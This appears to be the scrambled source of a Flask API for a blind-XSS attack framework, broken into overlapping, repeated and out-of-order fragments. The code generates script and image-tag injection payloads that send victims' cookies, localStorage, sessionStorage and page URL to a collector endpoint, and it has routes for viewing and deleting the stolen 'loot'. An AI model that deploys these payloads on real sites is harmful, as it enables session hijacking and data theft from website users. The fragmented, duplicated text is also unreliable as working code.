"payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload",
"xss_type, uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url,",
"400 for param, value in parameters.items(): if param == 'url': url = value",
"False local_storage = False session_storage = False get_url = False i_want_it_all = False",
"parameters = request.args.to_dict() other_data = '' xss_type = 'r' require_js = False require_params",
"local_storage = True require_js = True require_params = True elif param == 'session_storage':",
"or local_storage or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data !=",
"== 'local_storage': local_storage = True require_js = True require_params = True elif param",
"XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET'])",
"= True require_params = True elif param == 'local_storage': local_storage = True require_js",
"local_storage or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '':",
"<gh_stars>1-10 from flask import jsonify, request from app import db from app.models import",
"'js' require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400",
"= '' xss_type = 'r' require_js = False require_params = False cookies =",
"import bp from flask_login import login_required, current_user from app.decorators import permissions import json",
"js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script",
"data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail':",
"code_type = 'js' require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown code",
"return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes",
"require_js: payload += '<script>new Image().src=\"' else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url,",
"'?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&'",
"@bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of",
"= True require_js = True require_params = True else: if other_data != '':",
"+= 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if",
"\"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200 if code_type",
"+= other_data payload += '\"' if not require_params: payload += '\"' if code_type",
"from app.models import Client, XSS from app.api import bp from flask_login import login_required,",
"return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id,",
"';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else:",
"+= '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage",
"url, url, xss_type, uid, other_data) return (payload), 200 if code_type == 'js': payload",
"@bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid",
"json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404()",
"payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if cookies: payload",
"!= '': other_data += '&' other_data += '{}={}'.format(param, value) require_params = True if",
"+= '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or session_storage:",
"400 elif param == 'geturl': get_url = True require_js = True require_params =",
"def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for an XSS\"\"\" xss",
"XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE'])",
"= json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id,",
"client.uid parameters = request.args.to_dict() other_data = '' xss_type = 'r' require_js = False",
"'&' other_data += '{}={}'.format(param, value) require_params = True if i_want_it_all: if code_type ==",
"= json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail': 'Data",
"'{}={}'.format(param, value) require_params = True if i_want_it_all: if code_type == 'js': payload =",
"type'}), 400 elif param == 'geturl': get_url = True require_js = True require_params",
"def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK',",
"= True require_params = True elif param == 'code': if value == 'html':",
"'{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)'",
"if get_url: if cookies or local_storage or session_storage: payload += '+\"&' payload +=",
"code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return",
"get_url: if cookies or local_storage or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)'",
"XSS from app.api import bp from flask_login import login_required, current_user from app.decorators import",
"'s' elif param == 'cookies': cookies = True require_js = True require_params =",
"\"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict()",
"require_params: payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies:",
"request.args.to_dict() other_data = '' xss_type = 'r' require_js = False require_params = False",
"if i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type,",
"param == 'code': if value == 'html': code_type = 'html' elif value ==",
"'' xss_type = 'r' require_js = False require_params = False cookies = False",
"value elif param == 'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type",
"= True elif param == 'session_storage': session_storage = True require_js = True require_params",
"+= '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload +=",
"= False cookies = False local_storage = False session_storage = False get_url =",
"@bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404()",
"'error', 'detail': 'Unknown code type'}), 400 elif param == 'geturl': get_url = True",
"db from app.models import Client, XSS from app.api import bp from flask_login import",
"xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail':",
"param == 'stored': xss_type = 's' elif param == 'cookies': cookies = True",
"i_want_it_all = True elif param == 'stored': xss_type = 's' elif param ==",
"'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for an XSS\"\"\"",
"+= '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?'",
"';' else: if require_js: payload += '</script>' else: payload += ' />' return",
"param == 'geturl': get_url = True require_js = True require_params = True else:",
"payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or",
"request from app import db from app.models import Client, XSS from app.api import",
"if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data)",
"'<script>new Image().src=\"' else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if",
"xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return",
"successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of",
"True require_js = True require_params = True elif param == 'session_storage': session_storage =",
"'url': url = value elif param == 'i_want_it_all': i_want_it_all = True elif param",
"methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid =",
"if local_storage: if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if",
"if code_type == 'js': payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if",
"+= 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or session_storage: payload += '+\"&'",
"xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200",
"elif param == 'code': if value == 'html': code_type = 'html' elif value",
"if value == 'html': code_type = 'html' elif value == 'js': code_type =",
"return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param, value in parameters.items():",
"payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or local_storage or session_storage: payload +=",
"200 if code_type == 'js': payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\"",
"= True if i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url,",
"payload += '\"' if not require_params: payload += '\"' if code_type == 'js':",
"jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type):",
"import login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def",
"jsonify, request from app import db from app.models import Client, XSS from app.api",
"= True require_params = True elif param == 'session_storage': session_storage = True require_js",
"param == 'url': url = value elif param == 'i_want_it_all': i_want_it_all = True",
"False require_params = False cookies = False local_storage = False session_storage = False",
"from flask_login import login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET'])",
"uid = client.uid parameters = request.args.to_dict() other_data = '' xss_type = 'r' require_js",
"\"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS",
"require_js = True require_params = True elif param == 'local_storage': local_storage = True",
"for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200",
"True else: if other_data != '': other_data += '&' other_data += '{}={}'.format(param, value)",
"not require_params: payload += '\"' if code_type == 'js': payload += ';' else:",
"= XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>',",
"True elif param == 'session_storage': session_storage = True require_js = True require_params =",
"require_js = True require_params = True elif param == 'code': if value ==",
"session_storage or get_url: payload += '+\"&' payload += other_data payload += '\"' if",
"other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type,",
"value) require_params = True if i_want_it_all: if code_type == 'js': payload = ';}};var",
"loot_type): \"\"\"Deletes a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404()",
"session_storage = False get_url = False i_want_it_all = False code_type = 'html' if",
"+= '\"' if code_type == 'js': payload += ';' else: if require_js: payload",
"type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type,",
"= False get_url = False i_want_it_all = False code_type = 'html' if 'url'",
"True require_js = True require_params = True elif param == 'code': if value",
"return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param == 'geturl': get_url",
"src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200 if code_type ==",
"+= ';' else: if require_js: payload += '</script>' else: payload += ' />'",
"200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type",
"other_data += '&' other_data += '{}={}'.format(param, value) require_params = True if i_want_it_all: if",
"or get_url: payload += '+\"&' payload += other_data payload += '\"' if not",
"else: if require_js: payload += '</script>' else: payload += ' />' return (payload),",
"';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload), 200 else: payload =",
"xss_type = 's' elif param == 'cookies': cookies = True require_js = True",
"True require_params = True elif param == 'code': if value == 'html': code_type",
"payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload), 200 else:",
"'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}),",
"payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data = ''",
"methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss)",
"import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client =",
"+= '&' other_data += '{}={}'.format(param, value) require_params = True if i_want_it_all: if code_type",
"or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url: if cookies or",
"json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type):",
"= True elif param == 'code': if value == 'html': code_type = 'html'",
"== 'stored': xss_type = 's' elif param == 'cookies': cookies = True require_js",
"xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required",
"param == 'local_storage': local_storage = True require_js = True require_params = True elif",
"code type'}), 400 elif param == 'geturl': get_url = True require_js = True",
"= ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload), 200 else: payload",
"get_url = False i_want_it_all = False code_type = 'html' if 'url' not in",
"'html': code_type = 'html' elif value == 'js': code_type = 'js' require_js =",
"if require_js: payload += '</script>' else: payload += ' />' return (payload), 200",
"session_storage: if cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))' if get_url:",
"data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data': data[loot_type]}),",
"import Client, XSS from app.api import bp from flask_login import login_required, current_user from",
"client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data = '' xss_type",
"'local_storage': local_storage = True require_js = True require_params = True elif param ==",
"'js': code_type = 'js' require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown",
"else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else: payload +=",
"require_params = True else: if other_data != '': other_data += '&' other_data +=",
"+= '<script>new Image().src=\"' else: payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid)",
"data[loot_type]}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific",
"@login_required def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid",
"require_js = True require_params = True else: if other_data != '': other_data +=",
"\"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else: payload += '<img src=\"' payload",
"== 'js': payload += ';' else: if require_js: payload += '</script>' else: payload",
"= False i_want_it_all = False code_type = 'html' if 'url' not in parameters.keys():",
"code_type == 'js': payload += ';' else: if require_js: payload += '</script>' else:",
"if require_params: payload += '?' if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if",
"def xss_generate(id): \"\"\"Generates an XSS payload\"\"\" client = Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters",
"Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"' else: payload",
"other_data) return (payload), 200 if code_type == 'js': payload = ';};new Image().src=\"' else:",
"parameters.items(): if param == 'url': url = value elif param == 'i_want_it_all': i_want_it_all",
"'+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&'",
"+= 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&' payload +=",
"= 'html' elif value == 'js': code_type = 'js' require_js = True else:",
"or session_storage or get_url: payload += '+\"&' payload += other_data payload += '\"'",
"'': other_data += '&' other_data += '{}={}'.format(param, value) require_params = True if i_want_it_all:",
"= False session_storage = False get_url = False i_want_it_all = False code_type =",
"False get_url = False i_want_it_all = False code_type = 'html' if 'url' not",
"= True require_js = True require_params = True elif param == 'session_storage': session_storage",
"'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets",
"= True elif param == 'stored': xss_type = 's' elif param == 'cookies':",
"code_type = 'html' elif value == 'js': code_type = 'js' require_js = True",
"@bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for",
"+= '{}={}'.format(param, value) require_params = True if i_want_it_all: if code_type == 'js': payload",
"if cookies or local_storage or session_storage: payload += '+\"&' payload += 'origin_url=\"+encodeURIComponent(location.href)' if",
"'r' require_js = False require_params = False cookies = False local_storage = False",
"@login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit()",
"payload += '<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload +=",
"a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data =",
"flask import jsonify, request from app import db from app.models import Client, XSS",
"= ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new Image().src=\"'",
"require_params = True elif param == 'code': if value == 'html': code_type =",
"elif param == 'cookies': cookies = True require_js = True require_params = True",
"= True else: if other_data != '': other_data += '&' other_data += '{}={}'.format(param,",
"xss_type, uid, other_data) return (payload), 200 if code_type == 'js': payload = ';};new",
"XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit()",
"+= '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload +=",
"payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200",
"db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def",
"in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param, value",
"'error', 'detail': 'Missing url parameter'}), 400 for param, value in parameters.items(): if param",
"payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))'",
"'+\"&' payload += other_data payload += '\"' if not require_params: payload += '\"'",
"== 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format( url, url, xss_type, uid, other_data) return (payload),",
"require_js: payload += '</script>' else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>',",
"'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status':",
"200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data",
"'Missing url parameter'}), 400 for param, value in parameters.items(): if param == 'url':",
"value == 'html': code_type = 'html' elif value == 'js': code_type = 'js'",
"get_url: payload += '+\"&' payload += other_data payload += '\"' if not require_params:",
"else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param == 'geturl':",
"payload += ';' else: if require_js: payload += '</script>' else: payload += '",
"'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or session_storage or get_url:",
"get_url = True require_js = True require_params = True else: if other_data !=",
"+= '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if cookies: payload +=",
"Client, XSS from app.api import bp from flask_login import login_required, current_user from app.decorators",
"loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404()",
"= 's' elif param == 'cookies': cookies = True require_js = True require_params",
"payload = ';};new Image().src=\"' else: payload = \"\"\"'>\">\"\"\" if require_js: payload += '<script>new",
"'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&' payload += 'session_storage=\"+encodeURIComponent(JSON.stringify(sessionStorage))'",
"@permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return",
"+= '\"' if not require_params: payload += '\"' if code_type == 'js': payload",
"url parameter'}), 400 for param, value in parameters.items(): if param == 'url': url",
"= \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid, other_data) return (payload), 200 if",
"payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload += '+\"&' payload",
"False i_want_it_all = False code_type = 'html' if 'url' not in parameters.keys(): return",
"json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status': 'OK', 'detail': 'Data deleted",
"or local_storage or session_storage or get_url: payload += '+\"&' payload += other_data payload",
"uid, other_data) return (payload), 200 if code_type == 'js': payload = ';};new Image().src=\"'",
"'js': payload += ';' else: if require_js: payload += '</script>' else: payload +=",
"payload += 'origin_url=\"+encodeURIComponent(location.href)' if other_data != '': if cookies or local_storage or session_storage",
"'</script>' else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin',",
"app.api import bp from flask_login import login_required, current_user from app.decorators import permissions import",
"= False local_storage = False session_storage = False get_url = False i_want_it_all =",
"return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format( url, url, xss_type, uid,",
"'geturl': get_url = True require_js = True require_params = True else: if other_data",
"elif value == 'js': code_type = 'js' require_js = True else: return jsonify({'status':",
"False code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail':",
"payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def",
"login_required, current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id):",
"= True require_js = True require_params = True elif param == 'local_storage': local_storage",
"if cookies or local_storage or session_storage or get_url: payload += '+\"&' payload +=",
"other_data != '': other_data += '&' other_data += '{}={}'.format(param, value) require_params = True",
"else: payload += ' />' return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner'])",
"= False require_params = False cookies = False local_storage = False session_storage =",
"'session_storage': session_storage = True require_js = True require_params = True elif param ==",
"'url' not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for",
"return (payload), 200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\"",
"local_storage = False session_storage = False get_url = False i_want_it_all = False code_type",
"require_params = True if i_want_it_all: if code_type == 'js': payload = ';}};var js=document.createElement(\"script\");js.src=\"{}/static/collector.min.js\";js.onload=function(){{sendData(\"{}/api/x/{}/{}\",\"{}\")}};document.body.appendChild(js);'.format(",
"'<img src=\"' payload += '{}/api/x/{}/{}'.format(url, xss_type, uid) if require_params: payload += '?' if",
"= XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) data.pop(loot_type, None) xss.data = json.dumps(data) db.session.commit() return jsonify({'status':",
"app.models import Client, XSS from app.api import bp from flask_login import login_required, current_user",
"app import db from app.models import Client, XSS from app.api import bp from",
"= True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif param",
"'detail': 'XSS deleted successfuly'}), 200 @bp.route('/xss/<xss_id>/<loot_type>', methods=['GET']) @login_required def xss_loot_get(xss_id, loot_type): \"\"\"Gets a",
"require_js = True else: return jsonify({'status': 'error', 'detail': 'Unknown code type'}), 400 elif",
"payload += '+\"&' payload += 'local_storage=\"+encodeURIComponent(JSON.stringify(localStorage))' if session_storage: if cookies or local_storage: payload",
"+= '+\"&' payload += other_data payload += '\"' if not require_params: payload +=",
"== 'html': code_type = 'html' elif value == 'js': code_type = 'js' require_js",
"require_js = False require_params = False cookies = False local_storage = False session_storage",
"other_data != '': if cookies or local_storage or session_storage or get_url: payload +=",
"other_data = '' xss_type = 'r' require_js = False require_params = False cookies",
"if cookies: payload += 'cookies=\"+encodeURIComponent(document.cookie)' if local_storage: if cookies: payload += '+\"&' payload",
"param, value in parameters.items(): if param == 'url': url = value elif param",
"== 'session_storage': session_storage = True require_js = True require_params = True elif param",
"= Client.query.filter_by(id=id).first_or_404() uid = client.uid parameters = request.args.to_dict() other_data = '' xss_type =",
"url, xss_type, uid, other_data) return (payload), 200 else: payload = \"\"\"'>\"><script src={}/static/collector.min.js></script><script>sendData(\"{}/api/x/{}/{}\", \"{}\")</script>\"\"\".format(",
"if code_type == 'js': payload += ';' else: if require_js: payload += '</script>'",
"parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param, value in",
"== 'i_want_it_all': i_want_it_all = True elif param == 'stored': xss_type = 's' elif",
"def xss_loot_get(xss_id, loot_type): \"\"\"Gets a specific type of data for an XSS\"\"\" xss",
"value in parameters.items(): if param == 'url': url = value elif param ==",
"of data for an XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() data = json.loads(xss.data) return jsonify({'data':",
"param == 'cookies': cookies = True require_js = True require_params = True elif",
"session_storage = True require_js = True require_params = True elif param == 'code':",
"XSS\"\"\" xss = XSS.query.filter_by(id=xss_id).first_or_404() db.session.delete(xss) db.session.commit() return jsonify({'status': 'OK', 'detail': 'XSS deleted successfuly'}),",
"not in parameters.keys(): return jsonify({'status': 'error', 'detail': 'Missing url parameter'}), 400 for param,",
"other_data payload += '\"' if not require_params: payload += '\"' if code_type ==",
"@login_required @permissions(one_of=['admin', 'owner']) def xss_loot_delete(xss_id, loot_type): \"\"\"Deletes a specific type of data for",
"if require_js: payload += '<script>new Image().src=\"' else: payload += '<img src=\"' payload +=",
"200 @bp.route('/xss/<xss_id>', methods=['DELETE']) @login_required @permissions(one_of=['admin', 'owner']) def xss_delete(xss_id): \"\"\"Deletes an XSS\"\"\" xss =",
"= False code_type = 'html' if 'url' not in parameters.keys(): return jsonify({'status': 'error',",
"current_user from app.decorators import permissions import json @bp.route('/xss/generate/<id>', methods=['GET']) @login_required def xss_generate(id): \"\"\"Generates",
"from app import db from app.models import Client, XSS from app.api import bp"
] |
[
